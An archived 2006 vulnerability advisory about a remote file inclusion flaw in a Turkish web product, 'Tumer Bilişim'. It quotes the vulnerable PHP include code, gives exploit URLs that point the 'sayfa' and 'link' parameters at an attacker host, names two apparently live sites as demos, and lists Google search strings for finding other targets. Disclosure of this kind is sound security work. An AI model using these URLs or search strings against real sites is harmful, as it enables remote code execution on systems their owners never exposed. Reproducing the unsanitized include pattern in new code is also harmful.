Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:12196
HistoryApr 13, 2006 - 12:00 a.m.

Tьmer Bilişim File İnclusion

2006-04-1300:00:00
vulners.com
17

Tumer Bilişim File İnclusion

Site:www.sirmanet.com

Demo:http://www.kumburgaztml.k12.tr/
Demo2:http://www.dosteliyardim.org/


File İnclusion 1

if(isset($sayfa) && $sayfa != "")
{

$x = @include $sayfa;

sayfa parameter File inclusion

File İnclusion 2

if(isset($link) && $link != ""

)

$x = @include $link;

link parameter File inclusion


example:

http://site.com/index.php?sayfa=http://attacker

example:2

http://site.com/index.php?link=http://attacker


Credit:CodeXpLoder'tq

E-mail:[email protected]

site :http://biyo.tk http://biyosecurity.be


Google :

"Tasarım ve Hosting Tumer bilişim",
"Tumer bilişim"


Source:

http://liz0zim.no-ip.org/sirmanet.txt
http://www.blogcu.com/Liz0ziM/452548/


Check out the latest SMS services @ http://www.linuxmail.org
This allows you to send and receive SMS through your mailbox.

Powered by Outblaze